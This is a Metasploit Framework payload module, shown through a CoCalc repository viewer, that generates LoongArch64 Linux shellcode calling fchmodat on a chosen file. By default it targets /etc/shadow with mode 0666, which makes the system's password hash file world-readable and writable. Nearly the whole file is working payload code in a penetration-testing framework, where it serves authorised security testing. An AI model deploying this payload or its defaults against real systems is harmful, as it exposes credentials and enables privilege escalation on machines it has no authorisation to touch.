Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/linux/loongarch64/chmod.rb
59987 views
1
# frozen_string_literal: true

2


3
##

4
# This module requires Metasploit: https://metasploit.com/download

5
# Current source: https://github.com/rapid7/metasploit-framework

6
##

7


8
module MetasploitModule

9
  CachedSize = 48

10


11
  include Msf::Payload::Single

12
  include Msf::Payload::Linux

13


14
  def initialize(info = {})

15
    super(

16
      merge_info(

17
        info,

18
        'Name' => 'Linux Chmod',

19
        'Description' => 'Runs chmod on the specified file with specified mode.',

20
        'Author' => 'bcoles',

21
        'License' => MSF_LICENSE,

22
        'Platform' => 'linux',

23
        'Arch' => ARCH_LOONGARCH64,

24
        'References' => [

25
          ['URL', 'https://man7.org/linux/man-pages/man2/fchmodat.2.html'],

26
          ['URL', 'https://github.com/bcoles/shellcode/blob/main/loongarch64/chmod/chmod.s'],

27
        ]

28
      )

29
    )

30
    register_options([

31
      OptString.new('FILE', [ true, 'Filename to chmod', '/etc/shadow' ]),

32
      OptString.new('MODE', [ true, 'File mode (octal)', '0666' ], regex: /\A[0-7]+\z/),

33
    ])

34
  end

35


36
  # @return [String] the full path of the file to be modified

37
  def chmod_file_path

38
    datastore['FILE'] || ''

39
  end

40


41
  # @return [Integer] the desired mode for the file

42
  def mode

43
    (datastore['MODE'] || '0666').oct

44
  end

45


46
  # @return [Integer] LoongArch64 instruction to load mode into $a2 register

47
  # Uses ori $a2, $zero, <mode> instruction encoding

48
  # For example: 0x0386d806 ; ori $a2, $zero, 0x1b6 ; loads 0o666 into $a2

49
  def chmod_instruction(mode)

50
    0x03800006 | ((mode & 0xfff) << 10)

51
  end

52


53
  def generate(_opts = {})

54
    raise ArgumentError, "chmod mode (#{mode}) is greater than maximum mode size (0xFFF)" if mode > 0xFFF

55


56
    shellcode = [

57
      0x02fe7004,  # addi.d $a0, $zero, -100  # AT_FDCWD

58
      0x18000105,  # pcaddi $a1, 8            # pointer to path

59
      chmod_instruction(mode), # ori $a2, $zero, <mode>

60
      0x03800007,  # ori $a3, $zero, 0        # flags

61
      0x0380d40b,  # ori $a7, $zero, 53       # __NR_fchmodat

62
      0x002b0101,  # syscall 0x101

63
      0x03800004,  # ori $a0, $zero, 0        # exit code

64
      0x0381740b,  # ori $a7, $zero, 93       # __NR_exit

65
      0x002b0101,  # syscall 0x101

66
    ].pack('V*')

67
    shellcode += chmod_file_path + "\x00".b

68


69
    # align our shellcode to 4 bytes

70
    shellcode += "\x00".b while shellcode.bytesize % 4 != 0

71


72
    super.to_s + shellcode

73
  end

74
end

75


76